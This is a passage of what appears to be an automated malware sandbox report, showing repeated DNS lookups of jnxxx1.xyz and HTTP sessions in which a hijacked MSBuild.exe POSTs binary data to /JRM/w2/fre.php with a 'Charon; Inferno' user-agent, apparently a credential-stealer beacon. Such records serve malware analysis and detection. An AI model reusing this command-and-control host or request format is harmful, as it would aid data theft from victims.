                  Jan 14, 2022 14:25:57.448802948 CET8.8.8.8192.168.2.40x4a3cNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:57.448802948 CET8.8.8.8192.168.2.40x4a3cNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:59.284394979 CET8.8.8.8192.168.2.40x64efNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:59.284394979 CET8.8.8.8192.168.2.40x64efNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:01.225044012 CET8.8.8.8192.168.2.40x2e50No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:01.225044012 CET8.8.8.8192.168.2.40x2e50No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:02.673482895 CET8.8.8.8192.168.2.40x59d9No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:02.673482895 CET8.8.8.8192.168.2.40x59d9No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:04.130435944 CET8.8.8.8192.168.2.40xacb9No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:04.130435944 CET8.8.8.8192.168.2.40xacb9No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:06.095539093 CET8.8.8.8192.168.2.40x9f0bNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:06.095539093 CET8.8.8.8192.168.2.40x9f0bNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:07.657782078 CET8.8.8.8192.168.2.40x4d46No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:07.657782078 CET8.8.8.8192.168.2.40x4d46No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:09.268064976 CET8.8.8.8192.168.2.40x5feeNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:09.268064976 CET8.8.8.8192.168.2.40x5feeNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:12.191605091 CET8.8.8.8192.168.2.40x575aNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:12.191605091 CET8.8.8.8192.168.2.40x575aNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:17.279648066 CET8.8.8.8192.168.2.40xa3ceNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:17.279648066 CET8.8.8.8192.168.2.40xa3ceNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:21.269567013 CET8.8.8.8192.168.2.40xe127No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:21.269567013 CET8.8.8.8192.168.2.40xe127No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:25.929693937 CET8.8.8.8192.168.2.40x5d13No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:25.929693937 CET8.8.8.8192.168.2.40x5d13No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:31.519778967 CET8.8.8.8192.168.2.40x21b9No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:31.519778967 CET8.8.8.8192.168.2.40x21b9No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:35.270370007 CET8.8.8.8192.168.2.40xb7faNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:35.270370007 CET8.8.8.8192.168.2.40xb7faNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:37.565352917 CET8.8.8.8192.168.2.40xd6baNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:37.565352917 CET8.8.8.8192.168.2.40xd6baNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:38.978286028 CET8.8.8.8192.168.2.40x3feNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:38.978286028 CET8.8.8.8192.168.2.40x3feNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:40.482383013 CET8.8.8.8192.168.2.40x330eNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:40.482383013 CET8.8.8.8192.168.2.40x330eNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:42.286091089 CET8.8.8.8192.168.2.40x7f5dNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:42.286091089 CET8.8.8.8192.168.2.40x7f5dNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:44.295249939 CET8.8.8.8192.168.2.40xcb02No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:44.295249939 CET8.8.8.8192.168.2.40xcb02No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:45.956788063 CET8.8.8.8192.168.2.40x6dfbNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:45.956788063 CET8.8.8.8192.168.2.40x6dfbNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:47.373985052 CET8.8.8.8192.168.2.40x2a39No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:47.373985052 CET8.8.8.8192.168.2.40x2a39No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:48.950748920 CET8.8.8.8192.168.2.40x61e6No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:48.950748920 CET8.8.8.8192.168.2.40x61e6No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:50.373054981 CET8.8.8.8192.168.2.40xd717No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:50.373054981 CET8.8.8.8192.168.2.40xd717No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:51.989608049 CET8.8.8.8192.168.2.40xbdacNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:51.989608049 CET8.8.8.8192.168.2.40xbdacNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:54.090604067 CET8.8.8.8192.168.2.40x6bf6No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:54.090604067 CET8.8.8.8192.168.2.40x6bf6No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:56.698745012 CET8.8.8.8192.168.2.40x57efNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:56.698745012 CET8.8.8.8192.168.2.40x57efNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:58.151236057 CET8.8.8.8192.168.2.40xfb1eNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:58.151236057 CET8.8.8.8192.168.2.40xfb1eNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:01.331875086 CET8.8.8.8192.168.2.40x2659No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:01.331875086 CET8.8.8.8192.168.2.40x2659No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:03.280853987 CET8.8.8.8192.168.2.40xb719No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:03.280853987 CET8.8.8.8192.168.2.40xb719No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:05.299772978 CET8.8.8.8192.168.2.40x3b77No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:05.299772978 CET8.8.8.8192.168.2.40x3b77No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:08.235579014 CET8.8.8.8192.168.2.40x80bcNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:08.235579014 CET8.8.8.8192.168.2.40x80bcNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:09.929234028 CET8.8.8.8192.168.2.40xec4dNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:09.929234028 CET8.8.8.8192.168.2.40xec4dNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:11.562249899 CET8.8.8.8192.168.2.40xc52aNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:11.562249899 CET8.8.8.8192.168.2.40xc52aNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:12.986362934 CET8.8.8.8192.168.2.40x830cNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:12.986362934 CET8.8.8.8192.168.2.40x830cNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:14.377444029 CET8.8.8.8192.168.2.40x5f51No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:14.377444029 CET8.8.8.8192.168.2.40x5f51No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:15.835823059 CET8.8.8.8192.168.2.40x6800No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:15.835823059 CET8.8.8.8192.168.2.40x6800No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:17.256669044 CET8.8.8.8192.168.2.40x4719No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:17.256669044 CET8.8.8.8192.168.2.40x4719No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:18.622642994 CET8.8.8.8192.168.2.40xbe8aNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:18.622642994 CET8.8.8.8192.168.2.40xbe8aNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • jnxxx1.xyz

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.449770104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:18.175312996 CET1136OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 190
                  Connection: close
                  Jan 14, 2022 14:25:18.682698011 CET1137INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hi6EP8s%2FA6JM%2BRfu5cWelq8dHnWlM%2B89T9op67hAOd3ZG8Tvr3hS5TiyaLVdcu2jTPqCChMpx5nPsK2UQxsu8fd%2FrnlS%2BP3oLufopYezdUg3uyKNqp8JhbUvFs%2Fg"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd73084abee717a-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.449771104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:19.900110006 CET1138OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 190
                  Connection: close
                  Jan 14, 2022 14:25:20.352523088 CET1139INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nRMKvgI%2F0%2F2n899Ft%2FZSKTFJQFPnhZW11EVr9Rqdz%2FmHh3k5zZvZuHois03vtzJeSblchTHtmekHUN3OqsS0zS88IbX2dihqTK0mi6La%2BTDXa59E9fB5BSPVn2Ll"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7308f7ebe7172-DUS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.449780104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:34.630207062 CET1339OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:35.002677917 CET1340INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LgJg09fdfh163T5amD1arIYDv%2FNwSAADTX4ablO%2FZYppqWhI9Tk4rVdpHkhMtQP9XjHiYkj3GHAo44zVwo%2Fl5HrWcAQOLmjqJ4%2BVZZaQ9W94HGXsRqkwMK8uHqtt"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730eb7b0e68eb-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.449781104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:35.944353104 CET1341OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:36.349956036 CET1342INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ug8%2FAGi89aQisThCg%2BnxGvAgvoNw%2Fic%2BvC8b4kXYDPt1fAulMzxSdpmEX%2BIe7CQNaf7o5RL2%2FStbKvWuv6tXYQefJhyvAip%2F2mwNrm%2BoNWkg%2FkyeCXqekKD%2Fagql"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730f3cf35cdbf-CDG
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.449782104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:37.320518017 CET1343OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:37.702580929 CET1344INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xPKJxy99APDIhlVAha7cTUa%2FITUb7rrhYx9hVKGRS504XUq1CplU5Mj0hHOtPQIQw45EcMbbtTr6VwAC5jC%2FVRmTE8d7YFkiiqSNayLb93LRwpY3g8O3gjh300dc"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd730fc5ead3bd4-CDG
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.449783172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:38.912355900 CET1345OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:39.325426102 CET1346INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9kbgl8GYzYqDHxzTNpojc1OOLQ9g7Uf2N9Fg8XRZwk5oYDgucvNB4Ij3BciCJ263fVh2RHwrMkc9HdwWWr9sfh1CNnhScLcUpwtae4XvqbXAnAbelGSSTkwFMZIp"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd731064b4e4bf5-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.449786172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:41.572779894 CET1369OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:41.999090910 CET1370INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZgGoPHBueohZRmwh5mDFogsODharUtfq9CNIDypSehPnxGQ5cggmwF%2BO%2FLutdMI3%2FxmnUtgX6aXATJnX8PJ4qWyQmUplB26zccPzxzejORfjwOaxeTtHlih6a%2FCl"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd73116fa2a2014-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.449787104.21.60.17180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:43.959683895 CET1371OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:44.329082012 CET1372INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uvYvXjYPLMwGtndoIeApkR0ECRQ3x8cuNoQFYarnTRWoAt8vBuDfRyycp3q75GFmWPK%2Bc8H6FvlZmS50XvQsKeeLZbEhNl6SodeIRaysfC3rcNPunWHZQRXkAccQ"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd73125dc534242-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.449788172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:46.505954981 CET1373OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:46.927402973 CET1374INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dal10SZcT1tL%2FuvxOfyxO2m0u%2FF2fcKDAf6OUzw7FSKfnQU89eXnekvZ%2F0sSOez89pJQMhyFfrM8vcaIrlrZ3VCppeUQcEW3YOn8z%2FVhm4J8pXuX3S%2FV3SMmDQaF"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd73135cc481ee7-AMS
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.449789172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:48.319339991 CET1375OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:48.711286068 CET1376INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wpyAwjfJFUCS82v8TaElEXzTWShQhtQiJb93uGnV0KxbylLElIs6i%2BYixkVZmOpJCwkN3nPbiIZ2kc1uQASuAM1P49MhRlztH10tpn9pSAeRFdgoqae8CA3i1AFM"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd731411da83ba3-CDG
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.449790172.67.198.11180C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  TimestampkBytes transferredDirectionData
                  Jan 14, 2022 14:25:50.057955980 CET1377OUTPOST /JRM/w2/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: jnxxx1.xyz
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 45365306
                  Content-Length: 163
                  Connection: close
                  Jan 14, 2022 14:25:50.433623075 CET1378INHTTP/1.1 404 Not Found
                  Date: Fri, 14 Jan 2022 13:25:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LXsNoX67xKYIOkJtyuMYXG%2B2NDusQ7rQ2Lr6CWwfFGY6Tnt%2FktGdOjES9LEQKjyc3XTahUJkuTvOoYoLm6mAMARa4ZknwjsKj8%2BUwHoDs2FhNjd9v8xHoFZjVNGO"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 6cd7314be956695e-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
